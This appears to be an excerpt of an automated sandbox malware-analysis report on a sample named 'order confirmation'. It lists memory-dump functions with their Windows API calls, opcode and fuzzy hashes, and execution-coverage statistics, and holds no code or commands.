                                                    Function 0174D588 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0174D60F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654639015.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1740000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 91bce8233e0b7dadc1c4c4ec9ca75ddf45b893d87c8229991fd6cc1ddff25f8b
                                                    • Instruction ID: da16a530bdbe63cfa5a43cd91e996fac40e1af934b57c0df433d82081d904d39
                                                    • Opcode Fuzzy Hash: 91bce8233e0b7dadc1c4c4ec9ca75ddf45b893d87c8229991fd6cc1ddff25f8b
                                                    • Instruction Fuzzy Hash: 5D21C4B59002499FDB10CFAAD884ADEFBF9FB48310F14841AE958A3350D778A954CF65
                                                    Function 0174D581 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0174D60F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654639015.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1740000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 4f6f4665f19f5fb623f2a62a885742f9f120b8258661e036ce39a8729a588bcc
                                                    • Instruction ID: f3aa848aa2a1e58c0bd56a69d0ccdf2680efd4e5ff2689f5a6bef60c80bde2ae
                                                    • Opcode Fuzzy Hash: 4f6f4665f19f5fb623f2a62a885742f9f120b8258661e036ce39a8729a588bcc
                                                    • Instruction Fuzzy Hash: 6921E2B59002499FDB10CFAAD984ADEFBF5FB48310F14842AE958A3350D378A950CF65
                                                    Function 07D8E548 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07D8E5BE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 5101ef41fff833ffba371422e962c49a9b7dd9fd04d71d6aab7fc1f49a9839a5
                                                    • Instruction ID: a8ca5eccd3bb3f65840a1f02da43daa3fa161dc376d3118fe03cc5c6073c6b46
                                                    • Opcode Fuzzy Hash: 5101ef41fff833ffba371422e962c49a9b7dd9fd04d71d6aab7fc1f49a9839a5
                                                    • Instruction Fuzzy Hash: 5C1129719003499FDF24DFAAC845BEEBBF5EF88310F24881AE915A7250CB759540CF90
                                                    Function 07D91254 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07D93482,?,?,?,?,?), ref: 07D93527
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1669023545.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d90000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: CreateFromIconResource
                                                    • String ID:
                                                    • API String ID: 3668623891-0
                                                    • Opcode ID: c569804eeb4e67fb3175bdbdf7b390b072d33d04773a8f502a9d51d8e42f605f
                                                    • Instruction ID: 723528efcb3819de1dc836e2cd605fd405745aae57033ae5d2c1450493d60e7c
                                                    • Opcode Fuzzy Hash: c569804eeb4e67fb3175bdbdf7b390b072d33d04773a8f502a9d51d8e42f605f
                                                    • Instruction Fuzzy Hash: 6F1114B580034DAFDB10DFAAD844BDEBFF8EB48320F14841AE954A7250C379A954CFA5
                                                    Function 07D8E550 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07D8E5BE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 2eb4a1398b3aa51b06d592b7ca19e30839a62ff444dca4a0d4b75644067cc53c
                                                    • Instruction ID: 5873db047ae8448f3f2c0cfab6087c4e825b31ab51f1ab90a7d481539baff5b4
                                                    • Opcode Fuzzy Hash: 2eb4a1398b3aa51b06d592b7ca19e30839a62ff444dca4a0d4b75644067cc53c
                                                    • Instruction Fuzzy Hash: D51126719003499FDB10DFAAC844BDEBBF5AF88320F148819E519A7250CB759540CFA0
                                                    Function 07D8DF8A Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: bfd74862d07a0822faddd87ac36e8b6935e15e08267d932023d9d1a758400ba0
                                                    • Instruction ID: d42e733e51d39b5f62e446c4d44af880bd48304ff56e45c720bad7db6035e866
                                                    • Opcode Fuzzy Hash: bfd74862d07a0822faddd87ac36e8b6935e15e08267d932023d9d1a758400ba0
                                                    • Instruction Fuzzy Hash: 81113AB1D007898FDB24DFAAC44579EFBF5EF88220F148819D519B7240CB759544CF94
                                                    Function 07D8DF90 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 72713a861a32304b3ee4ed06a713a12688a4d159cad24e5c87ebf36c504dd127
                                                    • Instruction ID: 92c6ed40a5c0d82a896e1fe8e5c258af92c49ecbda1e6fe0f7ff715f545feb5c
                                                    • Opcode Fuzzy Hash: 72713a861a32304b3ee4ed06a713a12688a4d159cad24e5c87ebf36c504dd127
                                                    • Instruction Fuzzy Hash: 58113AB1D007498FDB20DFAAC44579EFBF5EF88620F148819D519B7240CB756544CFA4
                                                    Function 0174B298 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0174B2FE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654639015.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1740000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 83d599c1c9f4068c30c2029b6ab186051f4ececb977a8eae4cbf974fa539b1a9
                                                    • Instruction ID: f2c8e45ff1d57f24b571feeba151a3c5846eabd9e3d9ddbc073273e2f64e4c20
                                                    • Opcode Fuzzy Hash: 83d599c1c9f4068c30c2029b6ab186051f4ececb977a8eae4cbf974fa539b1a9
                                                    • Instruction Fuzzy Hash: 3F110FB5C002498FDB20CF9AC444A9EFBF4EF88224F10842AD819A7600C379A545CFA1
                                                    Function 082612B8 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,?,?,?), ref: 0826131D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1669817607.0000000008260000.00000040.00000800.00020000.00000000.sdmp, Offset: 08260000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_8260000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: b0f41d83410b97a2726d547ad7609a9ae634e7f05e6088eec66de815b6b081aa
                                                    • Instruction ID: 7f4a4656a7ed9921e208732ea99c3032fd3304fab0afbba4b0cab76af3f11184
                                                    • Opcode Fuzzy Hash: b0f41d83410b97a2726d547ad7609a9ae634e7f05e6088eec66de815b6b081aa
                                                    • Instruction Fuzzy Hash: 051122B58003498FDB10CF9AC985BDEBBF8FB48320F20840AD518A3600C378A554CFA0
                                                    Function 082612C0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,?,?,?), ref: 0826131D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1669817607.0000000008260000.00000040.00000800.00020000.00000000.sdmp, Offset: 08260000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_8260000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: 8332d1538b3bf968c0ee46d0874a4334f5fe30e90fa6b1e02411246236409e44
                                                    • Instruction ID: 2e234af46e6ad5252a9268ab53f8d026d3c45c015785f40aac3d56810a547844
                                                    • Opcode Fuzzy Hash: 8332d1538b3bf968c0ee46d0874a4334f5fe30e90fa6b1e02411246236409e44
                                                    • Instruction Fuzzy Hash: 7D11E5B58003499FDB10DF9AD885BDEFBF8FB48320F108419E559A7640C375A554CFA5
                                                    Function 07D94BD4 Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07D954C9,?,?), ref: 07D95A78
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1669023545.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d90000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: f897e4203554c5e6aa01012c0fddf07377478b43305100580ce6c5a1e248ebd3
                                                    • Instruction ID: 365549069cf24b93da22a96b8382e4ffe1f43a4b9b1f8774cd9df432f3a71df9
                                                    • Opcode Fuzzy Hash: f897e4203554c5e6aa01012c0fddf07377478b43305100580ce6c5a1e248ebd3
                                                    • Instruction Fuzzy Hash: 0C1143B18003499FDB20DF9AD584BDEBBF4EB48220F108429E959A7280C738A944CFA5
                                                    Function 07D95A18 Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07D954C9,?,?), ref: 07D95A78
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1669023545.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d90000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 8dd33d3b6ee815d8fca9d844e1c6393437f8e66e49e837b853c79708cc317b5b
                                                    • Instruction ID: b07c87c41e5b793c938b72611db264877ee4cfd28cc71b0c0a84f834b5e0594e
                                                    • Opcode Fuzzy Hash: 8dd33d3b6ee815d8fca9d844e1c6393437f8e66e49e837b853c79708cc317b5b
                                                    • Instruction Fuzzy Hash: 461125B58003499FDB10DF9AD584BDEBBF4EB48320F10856AD558A7240D778A544CFA5
                                                    Function 0164D4C4 Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654184552.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_164d000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3be858b5e2b514de6f668048c7d091e080d65691e014d24ccc1ed228b043a9a3
                                                    • Instruction ID: 871ebdeafcd760f68690630f64209417bf6c5c26301980f3d3b837d3bf48fbfd
                                                    • Opcode Fuzzy Hash: 3be858b5e2b514de6f668048c7d091e080d65691e014d24ccc1ed228b043a9a3
                                                    • Instruction Fuzzy Hash: B52103B1A04240DFDB09DF54DDC0B26BF66FB98328F20C569E9090B356C736D456CBA2
                                                    Function 0164D3D8 Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654184552.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_164d000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c5fa9e3c9a66cb3faa09c75084a397a35ab6fe8749e31748fdaecbb807163c72
                                                    • Instruction ID: 6ccd47e9cfc106274a8028ff64b5d201b6f9984dd716417fbdd24a0fd8f24b0d
                                                    • Opcode Fuzzy Hash: c5fa9e3c9a66cb3faa09c75084a397a35ab6fe8749e31748fdaecbb807163c72
                                                    • Instruction Fuzzy Hash: 2021F1B5A04204DFDB05DF54D9C4B5ABB65FBA8324F20C169E90A0B356C33AE456CAA2
                                                    Function 0165D1D4 Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654223039.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_165d000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 15478139b58906faeb6b6b886823f4f3744edb8d10d26600281ce51d509d7757
                                                    • Instruction ID: 02513bed90adee960a64353f075251156611d5d5249713d18d20f2151b91f7f5
                                                    • Opcode Fuzzy Hash: 15478139b58906faeb6b6b886823f4f3744edb8d10d26600281ce51d509d7757
                                                    • Instruction Fuzzy Hash: CD210071604300AFDB41DF94D9C0B26BBA1FB84224F20C66DEE094B382C376D446CA62
                                                    Function 0165D01C Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654223039.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_165d000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a016630239d829ad8d6b04eaab2434f8cdedc09627f0ebf3a72b70dde439fd08
                                                    • Instruction ID: f89e5d32c8e438af080a6049dfd94403ed4a946fe61fb5965587e47e27f4f71d
                                                    • Opcode Fuzzy Hash: a016630239d829ad8d6b04eaab2434f8cdedc09627f0ebf3a72b70dde439fd08
                                                    • Instruction Fuzzy Hash: 2C210E75604300DFDB55DF64D884B26BBA1FB88224F20C56DEC4A4B386C33AD847CA62
                                                    Function 0165D005 Relevance: .1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654223039.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_165d000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d0a56a8bf092a9efb8c848583ec2d0b0374ce969f3fa4cd28c52f5404c35c2b1
                                                    • Instruction ID: b056b5d11fb1ccc12f5aba4cfb56ed4db80055e73ecd8505d9a60649ae87f9e3
                                                    • Opcode Fuzzy Hash: d0a56a8bf092a9efb8c848583ec2d0b0374ce969f3fa4cd28c52f5404c35c2b1
                                                    • Instruction Fuzzy Hash: 6B219F755083849FDB03CF64D994B15BF71EB46214F28C5EAD8498F3A7C33A980ACB62
                                                    Function 0164D4BF Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654184552.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_164d000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                    • Instruction ID: 04213cf5d2f4f99ca46675228e5c13a9c1a27f7452ce9173903ecb4036e4d328
                                                    • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                    • Instruction Fuzzy Hash: 5411DF76904280CFCB06CF54D9C0B16BF72FB94324F24C6A9D8490B257C33AD456CBA1
                                                    Function 0164D3D3 Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654184552.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_164d000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                    • Instruction ID: 2ed25f70da8603e464171f6f468931939004e2b17cf0e62da806cdb3dbe0725a
                                                    • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                    • Instruction Fuzzy Hash: C011CD76904240DFCB02CF54D9C0B56BF62FB94224F2482A9D8090A257C33AE456CBA1
                                                    Function 0165D1CF Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654223039.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_165d000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                    • Instruction ID: 5e244b080ca8e0f5dc69387c0b9c10a2c9eb23cad37bfa6c96ff397424be9f48
                                                    • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                    • Instruction Fuzzy Hash: 2E11BB75504280DFCB02CF54C9C0B15BBA2FB84224F24C6ADDD494B396C33AD44ACB61
                                                    Function 0164D745 Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654184552.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_164d000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bcf3f02b20e961dbfb3ff14a31d9ffc44bac79a1d3b1e904fe1ce9867093bb4a
                                                    • Instruction ID: 682a1755de7b596677da3815205d614769a8d6968413644fc5a2cd443994b0c2
                                                    • Opcode Fuzzy Hash: bcf3f02b20e961dbfb3ff14a31d9ffc44bac79a1d3b1e904fe1ce9867093bb4a
                                                    • Instruction Fuzzy Hash: 4901F7718043849BF7109F55CC84B36BF98EF91625F14C51AED084A382C7399401CBB1
                                                    Function 0164D744 Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654184552.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_164d000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6d31320106e2d9826e50674948af8823fcf0e1640bddf631f6355c2f16d67a3d
                                                    • Instruction ID: 17ba21fddb268895891f1fedbf9fa004377e278b86fb9db6501ef8d0f18a19e8
                                                    • Opcode Fuzzy Hash: 6d31320106e2d9826e50674948af8823fcf0e1640bddf631f6355c2f16d67a3d
                                                    • Instruction Fuzzy Hash: 93F06271404384AFEB109E1ACC88B66FFD8EB91635F18C55AED085A386C7799844CBB1

                                                    Non-executed Functions

                                                    Function 07D9CD48 Relevance: .9, Instructions: 903COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1669023545.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d90000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9737bff5fbdf6d56ba5bd82f50cb4938c73c73807b749d2daef6829fbfe70044
                                                    • Instruction ID: 17c46cd399cd43214158c3981218e79d3acec0396f303ccc2cfc2bf8c65cd5f9
                                                    • Opcode Fuzzy Hash: 9737bff5fbdf6d56ba5bd82f50cb4938c73c73807b749d2daef6829fbfe70044
                                                    • Instruction Fuzzy Hash: 70722BB0E10219CFDF10DFA8C984AADFBB2FF89300F1585A9D44AAB255D730A995CF51
                                                    Function 07D8BC78 Relevance: .3, Instructions: 328COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 60df0ec4edfb21d8e91d62e9fbea7960177eaee6701a23d321316a36e6085d6a
                                                    • Instruction ID: b17690519c267cec2e77985baf1675de8defbb7f7e4e69b63225d1133355085c
                                                    • Opcode Fuzzy Hash: 60df0ec4edfb21d8e91d62e9fbea7960177eaee6701a23d321316a36e6085d6a
                                                    • Instruction Fuzzy Hash: CDE109B4E102198FDB14DFA8C590AAEFBF2FF89305F24816AE854AB355D7319941CF60
                                                    Function 07D8B84E Relevance: .3, Instructions: 313COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e74280f01d44026c9bba65a5870d351dc90bf01290af0516ddd4683eb2df8ca8
                                                    • Instruction ID: 61294472a0d18fb50eb03525fef8f9c7c5cce5950795d561265f04a3c52fbcde
                                                    • Opcode Fuzzy Hash: e74280f01d44026c9bba65a5870d351dc90bf01290af0516ddd4683eb2df8ca8
                                                    • Instruction Fuzzy Hash: 38E1E8B4E002198FDB14DFA9C590AAEFBF6FF89305F24815AE854AB355D730A941CF60
                                                    Function 07D8D768 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4531a420a1fc2baa7c656ad5996f93de819a5d81cb3cbebcf21d3c7c7327be81
                                                    • Instruction ID: 6cc13ad20511a44759dfaea26329da6793910ede4075876dcc3f1c4163b4a4b0
                                                    • Opcode Fuzzy Hash: 4531a420a1fc2baa7c656ad5996f93de819a5d81cb3cbebcf21d3c7c7327be81
                                                    • Instruction Fuzzy Hash: 0CE1E8B4E002198FDB14DFA9C590AAEFBF6FF89305F248159D854AB395D730A941CF60
                                                    Function 07D8E118 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ecc313c1ee3aaee500fb9376330712b2e1d4f184c8dde30377e063607047a77a
                                                    • Instruction ID: 10f55a02718f9704038b67b065f1fa56d497a7de8601e3f05f713126942f52d9
                                                    • Opcode Fuzzy Hash: ecc313c1ee3aaee500fb9376330712b2e1d4f184c8dde30377e063607047a77a
                                                    • Instruction Fuzzy Hash: 23E1F8B4E102198FDB14DFA9C580AAEFBB6FF89305F248159E854AB355D730AD41CF60
                                                    Function 07D8C0C0 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8637b7ab1544cf428d703bff4378636aaff4e692f571d4b4d525d83d87198d00
                                                    • Instruction ID: fdbcfd2c217e8b6178f7518ea7ba727bc904dd8689df527df5a26b601cbbd413
                                                    • Opcode Fuzzy Hash: 8637b7ab1544cf428d703bff4378636aaff4e692f571d4b4d525d83d87198d00
                                                    • Instruction Fuzzy Hash: F6E1EAB4E10219CFDB54DFA9C580AAEFBB6FF89305F248199D818A7355D730A942CF60
                                                    Function 0174DE84 Relevance: .3, Instructions: 264COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654639015.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1740000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f62edfa659f3a9dc387f1267188a541951d1695ded30cf5fc00be3cd41c02a28
                                                    • Instruction ID: f50965dbf485def451bea7283802fedbd85347ef82d9b9b612f143e7cf603758
                                                    • Opcode Fuzzy Hash: f62edfa659f3a9dc387f1267188a541951d1695ded30cf5fc00be3cd41c02a28
                                                    • Instruction Fuzzy Hash: 02A16132E00215CFCF25DFB8C44459EFBB2FF95300B25856AE905AB265EB71D955CB80
                                                    Function 07D8D757 Relevance: .1, Instructions: 135COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a0dccd0cd11e9a3cebc81a69f49a372b58e8ba631b0ce7f1f164bdbf741666b5
                                                    • Instruction ID: 03b35f7aaf59ed8e277e5a07e9cf21e3f37b966dc0e3529a6938d9ef0ca4c31c
                                                    • Opcode Fuzzy Hash: a0dccd0cd11e9a3cebc81a69f49a372b58e8ba631b0ce7f1f164bdbf741666b5
                                                    • Instruction Fuzzy Hash: A5511AB4E002198FDB14DFA9C5805AEFBF6FF89204F24816AD858AB355D7319D42CFA1

                                                    Execution Graph

                                                    Execution Coverage:1.2%
                                                    Dynamic/Decrypted Code Coverage:4.8%
                                                    Signature Coverage:7.6%
                                                    Total number of Nodes:145
                                                    Total number of Limit Nodes:15
